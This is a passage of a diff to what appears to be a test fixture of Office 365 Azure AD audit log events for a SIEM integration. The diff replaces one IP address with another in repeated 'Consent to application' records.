"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\"
,\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; 
\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -24325,9 +24325,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-11T16:45:42",
 "ExtendedProperties": [
 {
@@ -24562,7 +24562,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"a
dditionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: 
User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\"
,\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; 
\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -24592,9 +24592,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-11T16:45:42",
 "ExtendedProperties": [
 {
@@ -24829,7 +24829,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"a
dditionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: 
User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\"
,\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
